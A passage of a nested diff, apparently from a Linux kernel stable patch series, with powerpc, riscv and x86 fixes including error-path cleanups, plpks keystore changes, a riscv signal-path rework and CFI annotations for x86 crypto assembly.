++ * v1.018 documentation there is no counter_info_version 0x7.
++ * Undefining macro ENABLE_EVENTS_COUNTERINFO_V6, to disable the addition of
++ * deprecated events in "hv_gpci_event_attrs" attribute group, for platforms
++ * that supports counter_info_version 0x8 or above.
++ */
++#undef ENABLE_EVENTS_COUNTERINFO_V6
++
++/* Generate event list for platforms with counter_info_version 0x8 or above*/
+ static __maybe_unused struct attribute *hv_gpci_event_attrs[] = {
+ #include REQUEST_FILE
+ 	NULL
+diff --git a/arch/powerpc/platforms/52xx/mpc52xx_lpbfifo.c b/arch/powerpc/platforms/52xx/mpc52xx_lpbfifo.c
+index 48038aaedbd36..2875c206ac0f8 100644
+--- a/arch/powerpc/platforms/52xx/mpc52xx_lpbfifo.c
++++ b/arch/powerpc/platforms/52xx/mpc52xx_lpbfifo.c
+@@ -531,6 +531,7 @@ static int mpc52xx_lpbfifo_probe(struct platform_device *op)
+  err_bcom_rx_irq:
+ 	bcom_gen_bd_rx_release(lpbfifo.bcom_rx_task);
+  err_bcom_rx:
++	free_irq(lpbfifo.irq, &lpbfifo);
+  err_irq:
+ 	iounmap(lpbfifo.regs);
+ 	lpbfifo.regs = NULL;
+diff --git a/arch/powerpc/platforms/83xx/mpc832x_rdb.c b/arch/powerpc/platforms/83xx/mpc832x_rdb.c
+index e12cb44e717f1..caa96edf0e72a 100644
+--- a/arch/powerpc/platforms/83xx/mpc832x_rdb.c
++++ b/arch/powerpc/platforms/83xx/mpc832x_rdb.c
+@@ -107,7 +107,7 @@ static int __init of_fsl_spi_probe(char *type, char *compatible, u32 sysclk,
+ 
+ 		goto next;
+ unreg:
+-		platform_device_del(pdev);
++		platform_device_put(pdev);
+ err:
+ 		pr_err("%pOF: registration failed\n", np);
+ next:
+diff --git a/arch/powerpc/platforms/pseries/eeh_pseries.c b/arch/powerpc/platforms/pseries/eeh_pseries.c
+index 8e40ccac0f44e..e5a58a9b2fe9f 100644
+--- a/arch/powerpc/platforms/pseries/eeh_pseries.c
++++ b/arch/powerpc/platforms/pseries/eeh_pseries.c
+@@ -848,16 +848,7 @@ static int __init eeh_pseries_init(void)
+ 	}
+ 
+ 	/* Initialize error log size */
+-	eeh_error_buf_size = rtas_token("rtas-error-log-max");
+-	if (eeh_error_buf_size == RTAS_UNKNOWN_SERVICE) {
+-		pr_info("%s: unknown EEH error log size\n",
+-			__func__);
+-		eeh_error_buf_size = 1024;
+-	} else if (eeh_error_buf_size > RTAS_ERROR_LOG_MAX) {
+-		pr_info("%s: EEH error log size %d exceeds the maximal %d\n",
+-			__func__, eeh_error_buf_size, RTAS_ERROR_LOG_MAX);
+-		eeh_error_buf_size = RTAS_ERROR_LOG_MAX;
+-	}
++	eeh_error_buf_size = rtas_get_error_log_max();
+ 
+ 	/* Set EEH probe mode */
+ 	eeh_add_flag(EEH_PROBE_MODE_DEVTREE | EEH_ENABLE_IO_FOR_LOG);
+diff --git a/arch/powerpc/platforms/pseries/plpks.c b/arch/powerpc/platforms/pseries/plpks.c
+index f4b5b5a64db3d..63a1e1fe01851 100644
+--- a/arch/powerpc/platforms/pseries/plpks.c
++++ b/arch/powerpc/platforms/pseries/plpks.c
+@@ -75,7 +75,7 @@ static int pseries_status_to_err(int rc)
+ 	case H_FUNCTION:
+ 		err = -ENXIO;
+ 		break;
+-	case H_P1:
++	case H_PARAMETER:
+ 	case H_P2:
+ 	case H_P3:
+ 	case H_P4:
+@@ -111,7 +111,7 @@ static int pseries_status_to_err(int rc)
+ 		err = -EEXIST;
+ 		break;
+ 	case H_ABORTED:
+-		err = -EINTR;
++		err = -EIO;
+ 		break;
+ 	default:
+ 		err = -EINVAL;
+@@ -366,22 +366,24 @@ static int plpks_read_var(u8 consumer, struct plpks_var *var)
+ {
+ 	unsigned long retbuf[PLPAR_HCALL_BUFSIZE] = { 0 };
+ 	struct plpks_auth *auth;
+-	struct label *label;
++	struct label *label = NULL;
+ 	u8 *output;
+ 	int rc;
+ 
+ 	if (var->namelen > MAX_NAME_SIZE)
+ 		return -EINVAL;
+ 
+-	auth = construct_auth(PKS_OS_OWNER);
++	auth = construct_auth(consumer);
+ 	if (IS_ERR(auth))
+ 		return PTR_ERR(auth);
+ 
+-	label = construct_label(var->component, var->os, var->name,
+-				var->namelen);
+-	if (IS_ERR(label)) {
+-		rc = PTR_ERR(label);
+-		goto out_free_auth;
++	if (consumer == PKS_OS_OWNER) {
++		label = construct_label(var->component, var->os, var->name,
++					var->namelen);
++		if (IS_ERR(label)) {
++			rc = PTR_ERR(label);
++			goto out_free_auth;
++		}
+ 	}
+ 
+ 	output = kzalloc(maxobjsize, GFP_KERNEL);
+@@ -390,9 +392,15 @@ static int plpks_read_var(u8 consumer, struct plpks_var *var)
+ 		goto out_free_label;
+ 	}
+ 
+-	rc = plpar_hcall(H_PKS_READ_OBJECT, retbuf, virt_to_phys(auth),
+-			 virt_to_phys(label), label->size, virt_to_phys(output),
+-			 maxobjsize);
++	if (consumer == PKS_OS_OWNER)
++		rc = plpar_hcall(H_PKS_READ_OBJECT, retbuf, virt_to_phys(auth),
++				 virt_to_phys(label), label->size, virt_to_phys(output),
++				 maxobjsize);
++	else
++		rc = plpar_hcall(H_PKS_READ_OBJECT, retbuf, virt_to_phys(auth),
++				 virt_to_phys(var->name), var->namelen, virt_to_phys(output),
++				 maxobjsize);
++
+ 
+ 	if (rc != H_SUCCESS) {
+ 		pr_err("Failed to read variable %s for component %s with error %d\n",
+diff --git a/arch/powerpc/platforms/pseries/plpks.h b/arch/powerpc/platforms/pseries/plpks.h
+index c6a291367bb13..275ccd86bfb5e 100644
+--- a/arch/powerpc/platforms/pseries/plpks.h
++++ b/arch/powerpc/platforms/pseries/plpks.h
+@@ -17,7 +17,7 @@
+ #define WORLDREADABLE 0x08000000
+ #define SIGNEDUPDATE 0x01000000
+ 
+-#define PLPKS_VAR_LINUX	0x01
++#define PLPKS_VAR_LINUX	0x02
+ #define PLPKS_VAR_COMMON	0x04
+ 
+ struct plpks_var {
+diff --git a/arch/powerpc/sysdev/xive/spapr.c b/arch/powerpc/sysdev/xive/spapr.c
+index e2c8f93b535ba..e454192643910 100644
+--- a/arch/powerpc/sysdev/xive/spapr.c
++++ b/arch/powerpc/sysdev/xive/spapr.c
+@@ -439,6 +439,7 @@ static int xive_spapr_populate_irq_data(u32 hw_irq, struct xive_irq_data *data)
+ 
+ 	data->trig_mmio = ioremap(data->trig_page, 1u << data->esb_shift);
+ 	if (!data->trig_mmio) {
++		iounmap(data->eoi_mmio);
+ 		pr_err("Failed to map trigger page for irq 0x%x\n", hw_irq);
+ 		return -ENOMEM;
+ 	}
+diff --git a/arch/powerpc/xmon/xmon.c b/arch/powerpc/xmon/xmon.c
+index f51c882bf9023..e34d7809f6c9f 100644
+--- a/arch/powerpc/xmon/xmon.c
++++ b/arch/powerpc/xmon/xmon.c
+@@ -1525,9 +1525,9 @@ bpt_cmds(void)
+ 	cmd = inchar();
+ 
+ 	switch (cmd) {
+-	static const char badaddr[] = "Only kernel addresses are permitted for breakpoints\n";
+-	int mode;
+-	case 'd':	/* bd - hardware data breakpoint */
++	case 'd': {	/* bd - hardware data breakpoint */
++		static const char badaddr[] = "Only kernel addresses are permitted for breakpoints\n";
++		int mode;
+ 		if (xmon_is_ro) {
+ 			printf(xmon_ro_msg);
+ 			break;
+@@ -1560,6 +1560,7 @@ bpt_cmds(void)
+ 
+ 		force_enable_xmon();
+ 		break;
++	}
+ 
+ 	case 'i':	/* bi - hardware instr breakpoint */
+ 		if (xmon_is_ro) {
+diff --git a/arch/riscv/boot/dts/microchip/mpfs-icicle-kit-fabric.dtsi b/arch/riscv/boot/dts/microchip/mpfs-icicle-kit-fabric.dtsi
+index 24b1cfb9a73e4..5d3e5240e33ae 100644
+--- a/arch/riscv/boot/dts/microchip/mpfs-icicle-kit-fabric.dtsi
++++ b/arch/riscv/boot/dts/microchip/mpfs-icicle-kit-fabric.dtsi
+@@ -9,7 +9,7 @@
+ 		compatible = "microchip,corepwm-rtl-v4";
+ 		reg = <0x0 0x40000000 0x0 0xF0>;
+ 		microchip,sync-update-mask = /bits/ 32 <0>;
+-		#pwm-cells = <2>;
++		#pwm-cells = <3>;
+ 		clocks = <&fabric_clk3>;
+ 		status = "disabled";
+ 	};
+diff --git a/arch/riscv/boot/dts/microchip/mpfs-icicle-kit.dts b/arch/riscv/boot/dts/microchip/mpfs-icicle-kit.dts
+index ec7b7c2a3ce28..8ced67c3b00b2 100644
+--- a/arch/riscv/boot/dts/microchip/mpfs-icicle-kit.dts
++++ b/arch/riscv/boot/dts/microchip/mpfs-icicle-kit.dts
+@@ -37,7 +37,7 @@
+ 		status = "okay";
+ 	};
+ 
+-	ddrc_cache_hi: memory@1000000000 {
++	ddrc_cache_hi: memory@1040000000 {
+ 		device_type = "memory";
+ 		reg = <0x10 0x40000000 0x0 0x40000000>;
+ 		status = "okay";
+diff --git a/arch/riscv/boot/dts/microchip/mpfs-sev-kit-fabric.dtsi b/arch/riscv/boot/dts/microchip/mpfs-sev-kit-fabric.dtsi
+index 8545baf4d1290..39a77df489abf 100644
+--- a/arch/riscv/boot/dts/microchip/mpfs-sev-kit-fabric.dtsi
++++ b/arch/riscv/boot/dts/microchip/mpfs-sev-kit-fabric.dtsi
+@@ -13,33 +13,4 @@
+ 		#clock-cells = <0>;
+ 		clock-frequency = <125000000>;
+ 	};
+-
+-	pcie: pcie@2000000000 {
+-		compatible = "microchip,pcie-host-1.0";
+-		#address-cells = <0x3>;
+-		#interrupt-cells = <0x1>;
+-		#size-cells = <0x2>;
+-		device_type = "pci";
+-		reg = <0x20 0x0 0x0 0x8000000>, <0x0 0x43000000 0x0 0x10000>;
+-		reg-names = "cfg", "apb";
+-		bus-range = <0x0 0x7f>;
+-		interrupt-parent = <&plic>;
+-		interrupts = <119>;
+-		interrupt-map = <0 0 0 1 &pcie_intc 0>,
+-				<0 0 0 2 &pcie_intc 1>,
+-				<0 0 0 3 &pcie_intc 2>,
+-				<0 0 0 4 &pcie_intc 3>;
+-		interrupt-map-mask = <0 0 0 7>;
+-		clocks = <&fabric_clk1>, <&fabric_clk1>, <&fabric_clk3>;
+-		clock-names = "fic0", "fic1", "fic3";
+-		ranges = <0x3000000 0x0 0x8000000 0x20 0x8000000 0x0 0x80000000>;
+-		msi-parent = <&pcie>;
+-		msi-controller;
+-		status = "disabled";
+-		pcie_intc: interrupt-controller {
+-			#address-cells = <0>;
+-			#interrupt-cells = <1>;
+-			interrupt-controller;
+-		};
+-	};
+ };
+diff --git a/arch/riscv/include/asm/hugetlb.h b/arch/riscv/include/asm/hugetlb.h
+index a5c2ca1d1cd8b..ec19d6afc8965 100644
+--- a/arch/riscv/include/asm/hugetlb.h
++++ b/arch/riscv/include/asm/hugetlb.h
+@@ -5,4 +5,10 @@
+ #include <asm-generic/hugetlb.h>
+ #include <asm/page.h>
+ 
++static inline void arch_clear_hugepage_flags(struct page *page)
++{
++	clear_bit(PG_dcache_clean, &page->flags);
++}
++#define arch_clear_hugepage_flags arch_clear_hugepage_flags
++
+ #endif /* _ASM_RISCV_HUGETLB_H */
+diff --git a/arch/riscv/include/asm/io.h b/arch/riscv/include/asm/io.h
+index 92080a2279372..42497d487a174 100644
+--- a/arch/riscv/include/asm/io.h
++++ b/arch/riscv/include/asm/io.h
+@@ -135,4 +135,9 @@ __io_writes_outs(outs, u64, q, __io_pbr(), __io_paw())
+ 
+ #include <asm-generic/io.h>
+ 
++#ifdef CONFIG_MMU
++#define arch_memremap_wb(addr, size)	\
++	((__force void *)ioremap_prot((addr), (size), _PAGE_KERNEL))
++#endif
++
+ #endif /* _ASM_RISCV_IO_H */
+diff --git a/arch/riscv/include/asm/pgtable-64.h b/arch/riscv/include/asm/pgtable-64.h
+index dc42375c23571..42a042c0e13ed 100644
+--- a/arch/riscv/include/asm/pgtable-64.h
++++ b/arch/riscv/include/asm/pgtable-64.h
+@@ -25,7 +25,11 @@ extern bool pgtable_l5_enabled;
+ #define PGDIR_MASK      (~(PGDIR_SIZE - 1))
+ 
+ /* p4d is folded into pgd in case of 4-level page table */
+-#define P4D_SHIFT      39
++#define P4D_SHIFT_L3   30
++#define P4D_SHIFT_L4   39
++#define P4D_SHIFT_L5   39
++#define P4D_SHIFT      (pgtable_l5_enabled ? P4D_SHIFT_L5 : \
++		(pgtable_l4_enabled ? P4D_SHIFT_L4 : P4D_SHIFT_L3))
+ #define P4D_SIZE       (_AC(1, UL) << P4D_SHIFT)
+ #define P4D_MASK       (~(P4D_SIZE - 1))
+ 
+diff --git a/arch/riscv/kernel/entry.S b/arch/riscv/kernel/entry.S
+index 186abd146eaff..3221a9e5f3724 100644
+--- a/arch/riscv/kernel/entry.S
++++ b/arch/riscv/kernel/entry.S
+@@ -263,12 +263,11 @@ ret_from_exception:
+ #endif
+ 	bnez s0, resume_kernel
+ 
+-resume_userspace:
+ 	/* Interrupts must be disabled here so flags are checked atomically */
+ 	REG_L s0, TASK_TI_FLAGS(tp) /* current_thread_info->flags */
+ 	andi s1, s0, _TIF_WORK_MASK
+-	bnez s1, work_pending
+-
++	bnez s1, resume_userspace_slow
++resume_userspace:
+ #ifdef CONFIG_CONTEXT_TRACKING_USER
+ 	call user_enter_callable
+ #endif
+@@ -368,19 +367,12 @@ resume_kernel:
+ 	j restore_all
+ #endif
+ 
+-work_pending:
++resume_userspace_slow:
+ 	/* Enter slow path for supplementary processing */
+-	la ra, ret_from_exception
+-	andi s1, s0, _TIF_NEED_RESCHED
+-	bnez s1, work_resched
+-work_notifysig:
+-	/* Handle pending signals and notify-resume requests */
+-	csrs CSR_STATUS, SR_IE /* Enable interrupts for do_notify_resume() */
+ 	move a0, sp /* pt_regs */
+ 	move a1, s0 /* current_thread_info->flags */
+-	tail do_notify_resume
+-work_resched:
+-	tail schedule
++	call do_work_pending
++	j resume_userspace
+ 
+ /* Slow paths for ptrace. */
+ handle_syscall_trace_enter:
+diff --git a/arch/riscv/kernel/signal.c b/arch/riscv/kernel/signal.c
+index 5c591123c4409..bfb2afa4135f8 100644
+--- a/arch/riscv/kernel/signal.c
++++ b/arch/riscv/kernel/signal.c
+@@ -313,19 +313,27 @@ static void do_signal(struct pt_regs *regs)
+ }
+ 
+ /*
+- * notification of userspace execution resumption
+- * - triggered by the _TIF_WORK_MASK flags
++ * Handle any pending work on the resume-to-userspace path, as indicated by
++ * _TIF_WORK_MASK. Entered from assembly with IRQs off.
+  */
+-asmlinkage __visible void do_notify_resume(struct pt_regs *regs,
+-					   unsigned long thread_info_flags)
++asmlinkage __visible void do_work_pending(struct pt_regs *regs,
++					  unsigned long thread_info_flags)
+ {
+-	if (thread_info_flags & _TIF_UPROBE)
+-		uprobe_notify_resume(regs);
+-
+-	/* Handle pending signal delivery */
+-	if (thread_info_flags & (_TIF_SIGPENDING | _TIF_NOTIFY_SIGNAL))
+-		do_signal(regs);
+-
+-	if (thread_info_flags & _TIF_NOTIFY_RESUME)
+-		resume_user_mode_work(regs);
++	do {
++		if (thread_info_flags & _TIF_NEED_RESCHED) {
++			schedule();
++		} else {
++			local_irq_enable();
++			if (thread_info_flags & _TIF_UPROBE)
++				uprobe_notify_resume(regs);
++			/* Handle pending signal delivery */
++			if (thread_info_flags & (_TIF_SIGPENDING |
++						 _TIF_NOTIFY_SIGNAL))
++				do_signal(regs);
++			if (thread_info_flags & _TIF_NOTIFY_RESUME)
++				resume_user_mode_work(regs);
++		}
++		local_irq_disable();
++		thread_info_flags = read_thread_flags();
++	} while (thread_info_flags & _TIF_WORK_MASK);
+ }
+diff --git a/arch/riscv/kernel/traps.c b/arch/riscv/kernel/traps.c
+index 7abd8e4c4df63..f77cb8e42bd2a 100644
+--- a/arch/riscv/kernel/traps.c
++++ b/arch/riscv/kernel/traps.c
+@@ -214,7 +214,7 @@ static DEFINE_PER_CPU(unsigned long [OVERFLOW_STACK_SIZE/sizeof(long)],
+  * shadow stack, handled_ kernel_ stack_ overflow(in kernel/entry.S) is used
+  * to get per-cpu overflow stack(get_overflow_stack).
+  */
+-long shadow_stack[SHADOW_OVERFLOW_STACK_SIZE/sizeof(long)];
++long shadow_stack[SHADOW_OVERFLOW_STACK_SIZE/sizeof(long)] __aligned(16);
+ asmlinkage unsigned long get_overflow_stack(void)
+ {
+ 	return (unsigned long)this_cpu_ptr(overflow_stack) +
+diff --git a/arch/riscv/kvm/vcpu.c b/arch/riscv/kvm/vcpu.c
+index 71ebbc4821f0e..5174ef54ad1d9 100644
+--- a/arch/riscv/kvm/vcpu.c
++++ b/arch/riscv/kvm/vcpu.c
+@@ -296,12 +296,15 @@ static int kvm_riscv_vcpu_set_reg_config(struct kvm_vcpu *vcpu,
+ 	if (copy_from_user(&reg_val, uaddr, KVM_REG_SIZE(reg->id)))
+ 		return -EFAULT;
+ 
+-	/* This ONE REG interface is only defined for single letter extensions */
+-	if (fls(reg_val) >= RISCV_ISA_EXT_BASE)
+-		return -EINVAL;
+-
+ 	switch (reg_num) {
+ 	case KVM_REG_RISCV_CONFIG_REG(isa):
++		/*
++		 * This ONE REG interface is only defined for
++		 * single letter extensions.
++		 */
++		if (fls(reg_val) >= RISCV_ISA_EXT_BASE)
++			return -EINVAL;
++
+ 		if (!vcpu->arch.ran_atleast_once) {
+ 			/* Ignore the enable/disable request for certain extensions */
+ 			for (i = 0; i < RISCV_ISA_EXT_BASE; i++) {
+diff --git a/arch/riscv/mm/physaddr.c b/arch/riscv/mm/physaddr.c
+index 19cf25a74ee29..9b18bda74154e 100644
+--- a/arch/riscv/mm/physaddr.c
++++ b/arch/riscv/mm/physaddr.c
+@@ -22,7 +22,7 @@ EXPORT_SYMBOL(__virt_to_phys);
+ phys_addr_t __phys_addr_symbol(unsigned long x)
+ {
+ 	unsigned long kernel_start = kernel_map.virt_addr;
+-	unsigned long kernel_end = (unsigned long)_end;
++	unsigned long kernel_end = kernel_start + kernel_map.size;
+ 
+ 	/*
+ 	 * Boundary checking aginst the kernel image mapping.
+diff --git a/arch/riscv/net/bpf_jit_comp64.c b/arch/riscv/net/bpf_jit_comp64.c
+index 00df3a8f92acd..f2417ac54edd6 100644
+--- a/arch/riscv/net/bpf_jit_comp64.c
++++ b/arch/riscv/net/bpf_jit_comp64.c
+@@ -136,6 +136,25 @@ static bool in_auipc_jalr_range(s64 val)
+ 		val < ((1L << 31) - (1L << 11));
+ }
+ 
++/* Emit fixed-length instructions for address */
++static int emit_addr(u8 rd, u64 addr, bool extra_pass, struct rv_jit_context *ctx)
++{
++	u64 ip = (u64)(ctx->insns + ctx->ninsns);
++	s64 off = addr - ip;
++	s64 upper = (off + (1 << 11)) >> 12;
++	s64 lower = off & 0xfff;
++
++	if (extra_pass && !in_auipc_jalr_range(off)) {
++		pr_err("bpf-jit: target offset 0x%llx is out of range\n", off);
++		return -ERANGE;
++	}
++
++	emit(rv_auipc(rd, upper), ctx);
++	emit(rv_addi(rd, rd, lower), ctx);
++	return 0;
++}
++
++/* Emit variable-length instructions for 32-bit and 64-bit imm */
+ static void emit_imm(u8 rd, s64 val, struct rv_jit_context *ctx)
+ {
+ 	/* Note that the immediate from the add is sign-extended,
+@@ -1050,7 +1069,15 @@ out_be:
+ 		u64 imm64;
+ 
+ 		imm64 = (u64)insn1.imm << 32 | (u32)imm;
+-		emit_imm(rd, imm64, ctx);
++		if (bpf_pseudo_func(insn)) {
++			/* fixed-length insns for extra jit pass */
++			ret = emit_addr(rd, imm64, extra_pass, ctx);
++			if (ret)
++				return ret;
++		} else {
++			emit_imm(rd, imm64, ctx);
++		}
++
+ 		return 1;
+ 	}
+ 
+diff --git a/arch/x86/Kconfig b/arch/x86/Kconfig
+index 67745ceab0dbc..b2c0fce3f257c 100644
+--- a/arch/x86/Kconfig
++++ b/arch/x86/Kconfig
+@@ -462,8 +462,8 @@ config X86_X2APIC
+ 
+ 	  Some Intel systems circa 2022 and later are locked into x2APIC mode
+ 	  and can not fall back to the legacy APIC modes if SGX or TDX are
+-	  enabled in the BIOS.  They will be unable to boot without enabling
+-	  this option.
++	  enabled in the BIOS. They will boot with very reduced functionality
++	  without enabling this option.
+ 
+ 	  If you don't know what to do here, say N.
+ 
+diff --git a/arch/x86/crypto/aegis128-aesni-asm.S b/arch/x86/crypto/aegis128-aesni-asm.S
+index b48ddebb47489..cdf3215ec272c 100644
+--- a/arch/x86/crypto/aegis128-aesni-asm.S
++++ b/arch/x86/crypto/aegis128-aesni-asm.S
+@@ -7,6 +7,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ #include <asm/frame.h>
+ 
+ #define STATE0	%xmm0
+@@ -402,7 +403,7 @@ SYM_FUNC_END(crypto_aegis128_aesni_ad)
+  * void crypto_aegis128_aesni_enc(void *state, unsigned int length,
+  *                                const void *src, void *dst);
+  */
+-SYM_FUNC_START(crypto_aegis128_aesni_enc)
++SYM_TYPED_FUNC_START(crypto_aegis128_aesni_enc)
+ 	FRAME_BEGIN
+ 
+ 	cmp $0x10, LEN
+@@ -499,7 +500,7 @@ SYM_FUNC_END(crypto_aegis128_aesni_enc)
+  * void crypto_aegis128_aesni_enc_tail(void *state, unsigned int length,
+  *                                     const void *src, void *dst);
+  */
+-SYM_FUNC_START(crypto_aegis128_aesni_enc_tail)
++SYM_TYPED_FUNC_START(crypto_aegis128_aesni_enc_tail)
+ 	FRAME_BEGIN
+ 
+ 	/* load the state: */
+@@ -556,7 +557,7 @@ SYM_FUNC_END(crypto_aegis128_aesni_enc_tail)
+  * void crypto_aegis128_aesni_dec(void *state, unsigned int length,
+  *                                const void *src, void *dst);
+  */
+-SYM_FUNC_START(crypto_aegis128_aesni_dec)
++SYM_TYPED_FUNC_START(crypto_aegis128_aesni_dec)
+ 	FRAME_BEGIN
+ 
+ 	cmp $0x10, LEN
+@@ -653,7 +654,7 @@ SYM_FUNC_END(crypto_aegis128_aesni_dec)
+  * void crypto_aegis128_aesni_dec_tail(void *state, unsigned int length,
+  *                                     const void *src, void *dst);
+  */
+-SYM_FUNC_START(crypto_aegis128_aesni_dec_tail)
++SYM_TYPED_FUNC_START(crypto_aegis128_aesni_dec_tail)
+ 	FRAME_BEGIN
+ 
+ 	/* load the state: */
+diff --git a/arch/x86/crypto/aria-aesni-avx-asm_64.S b/arch/x86/crypto/aria-aesni-avx-asm_64.S
+index c75fd7d015ed8..03ae4cd1d976a 100644
+--- a/arch/x86/crypto/aria-aesni-avx-asm_64.S
++++ b/arch/x86/crypto/aria-aesni-avx-asm_64.S
+@@ -7,6 +7,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ #include <asm/frame.h>
+ 
+ /* struct aria_ctx: */
+@@ -913,7 +914,7 @@ SYM_FUNC_START_LOCAL(__aria_aesni_avx_crypt_16way)
+ 	RET;
+ SYM_FUNC_END(__aria_aesni_avx_crypt_16way)
+ 
+-SYM_FUNC_START(aria_aesni_avx_encrypt_16way)
++SYM_TYPED_FUNC_START(aria_aesni_avx_encrypt_16way)
+ 	/* input:
+ 	*      %rdi: ctx, CTX
+ 	*      %rsi: dst
+@@ -938,7 +939,7 @@ SYM_FUNC_START(aria_aesni_avx_encrypt_16way)
+ 	RET;
+ SYM_FUNC_END(aria_aesni_avx_encrypt_16way)
+ 
+-SYM_FUNC_START(aria_aesni_avx_decrypt_16way)
++SYM_TYPED_FUNC_START(aria_aesni_avx_decrypt_16way)
+ 	/* input:
+ 	*      %rdi: ctx, CTX
+ 	*      %rsi: dst
+@@ -1039,7 +1040,7 @@ SYM_FUNC_START_LOCAL(__aria_aesni_avx_ctr_gen_keystream_16way)
+ 	RET;
+ SYM_FUNC_END(__aria_aesni_avx_ctr_gen_keystream_16way)
+ 
+-SYM_FUNC_START(aria_aesni_avx_ctr_crypt_16way)
++SYM_TYPED_FUNC_START(aria_aesni_avx_ctr_crypt_16way)
+ 	/* input:
+ 	*      %rdi: ctx
+ 	*      %rsi: dst
+@@ -1208,7 +1209,7 @@ SYM_FUNC_START_LOCAL(__aria_aesni_avx_gfni_crypt_16way)
+ 	RET;
+ SYM_FUNC_END(__aria_aesni_avx_gfni_crypt_16way)
+ 
+-SYM_FUNC_START(aria_aesni_avx_gfni_encrypt_16way)
++SYM_TYPED_FUNC_START(aria_aesni_avx_gfni_encrypt_16way)
+ 	/* input:
+ 	*      %rdi: ctx, CTX
+ 	*      %rsi: dst
+@@ -1233,7 +1234,7 @@ SYM_FUNC_START(aria_aesni_avx_gfni_encrypt_16way)
+ 	RET;
+ SYM_FUNC_END(aria_aesni_avx_gfni_encrypt_16way)
+ 
+-SYM_FUNC_START(aria_aesni_avx_gfni_decrypt_16way)
++SYM_TYPED_FUNC_START(aria_aesni_avx_gfni_decrypt_16way)
+ 	/* input:
+ 	*      %rdi: ctx, CTX
+ 	*      %rsi: dst
+@@ -1258,7 +1259,7 @@ SYM_FUNC_START(aria_aesni_avx_gfni_decrypt_16way)
+ 	RET;
+ SYM_FUNC_END(aria_aesni_avx_gfni_decrypt_16way)
+ 
+-SYM_FUNC_START(aria_aesni_avx_gfni_ctr_crypt_16way)
++SYM_TYPED_FUNC_START(aria_aesni_avx_gfni_ctr_crypt_16way)
+ 	/* input:
+ 	*      %rdi: ctx
+ 	*      %rsi: dst
+diff --git a/arch/x86/crypto/sha1_ni_asm.S b/arch/x86/crypto/sha1_ni_asm.S
+index 2f94ec0e763bf..3cae5a1bb3d6e 100644
+--- a/arch/x86/crypto/sha1_ni_asm.S
++++ b/arch/x86/crypto/sha1_ni_asm.S
+@@ -54,6 +54,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ 
+ #define DIGEST_PTR	%rdi	/* 1st arg */
+ #define DATA_PTR	%rsi	/* 2nd arg */
+@@ -93,7 +94,7 @@
+  */
+ .text
+ .align 32
+-SYM_FUNC_START(sha1_ni_transform)
++SYM_TYPED_FUNC_START(sha1_ni_transform)
+ 	push		%rbp
+ 	mov		%rsp, %rbp
+ 	sub		$FRAME_SIZE, %rsp
+diff --git a/arch/x86/crypto/sha1_ssse3_asm.S b/arch/x86/crypto/sha1_ssse3_asm.S
+index 263f916362e02..f54988c80eb40 100644
+--- a/arch/x86/crypto/sha1_ssse3_asm.S
++++ b/arch/x86/crypto/sha1_ssse3_asm.S
+@@ -25,6 +25,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ 
+ #define CTX	%rdi	// arg1
+ #define BUF	%rsi	// arg2
+@@ -67,7 +68,7 @@
+  * param: function's name
+  */
+ .macro SHA1_VECTOR_ASM  name
+-	SYM_FUNC_START(\name)
++	SYM_TYPED_FUNC_START(\name)
+ 
+ 	push	%rbx
+ 	push	%r12
+diff --git a/arch/x86/crypto/sha256-avx-asm.S b/arch/x86/crypto/sha256-avx-asm.S
+index 3baa1ec390974..06ea30c20828d 100644
+--- a/arch/x86/crypto/sha256-avx-asm.S
++++ b/arch/x86/crypto/sha256-avx-asm.S
+@@ -48,6 +48,7 @@
+ ########################################################################
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ 
+ ## assume buffers not aligned
+ #define    VMOVDQ vmovdqu
+@@ -346,7 +347,7 @@ a = TMP_
+ ## arg 3 : Num blocks
+ ########################################################################
+ .text
+-SYM_FUNC_START(sha256_transform_avx)
++SYM_TYPED_FUNC_START(sha256_transform_avx)
+ .align 32
+ 	pushq   %rbx
+ 	pushq   %r12
+diff --git a/arch/x86/crypto/sha256-avx2-asm.S b/arch/x86/crypto/sha256-avx2-asm.S
+index 9bcdbc47b8b4b..2d2be531a11ed 100644
+--- a/arch/x86/crypto/sha256-avx2-asm.S
++++ b/arch/x86/crypto/sha256-avx2-asm.S
+@@ -49,6 +49,7 @@
+ ########################################################################
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ 
+ ## assume buffers not aligned
+ #define	VMOVDQ vmovdqu
+@@ -523,7 +524,7 @@ STACK_SIZE	= _CTX      + _CTX_SIZE
+ ## arg 3 : Num blocks
+ ########################################################################
+ .text
+-SYM_FUNC_START(sha256_transform_rorx)
++SYM_TYPED_FUNC_START(sha256_transform_rorx)
+ .align 32
+ 	pushq	%rbx
+ 	pushq	%r12
+diff --git a/arch/x86/crypto/sha256-ssse3-asm.S b/arch/x86/crypto/sha256-ssse3-asm.S
+index c4a5db612c327..7db28839108dd 100644
+--- a/arch/x86/crypto/sha256-ssse3-asm.S
++++ b/arch/x86/crypto/sha256-ssse3-asm.S
+@@ -47,6 +47,7 @@
+ ########################################################################
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ 
+ ## assume buffers not aligned
+ #define    MOVDQ movdqu
+@@ -355,7 +356,7 @@ a = TMP_
+ ## arg 3 : Num blocks
+ ########################################################################
+ .text
+-SYM_FUNC_START(sha256_transform_ssse3)
++SYM_TYPED_FUNC_START(sha256_transform_ssse3)
+ .align 32
+ 	pushq   %rbx
+ 	pushq   %r12
+diff --git a/arch/x86/crypto/sha256_ni_asm.S b/arch/x86/crypto/sha256_ni_asm.S
+index 94d50dd27cb53..47f93937f798a 100644
+--- a/arch/x86/crypto/sha256_ni_asm.S
++++ b/arch/x86/crypto/sha256_ni_asm.S
+@@ -54,6 +54,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ 
+ #define DIGEST_PTR	%rdi	/* 1st arg */
+ #define DATA_PTR	%rsi	/* 2nd arg */
+@@ -97,7 +98,7 @@
+ 
+ .text
+ .align 32
+-SYM_FUNC_START(sha256_ni_transform)
++SYM_TYPED_FUNC_START(sha256_ni_transform)
+ 
+ 	shl		$6, NUM_BLKS		/*  convert to bytes */
+ 	jz		.Ldone_hash
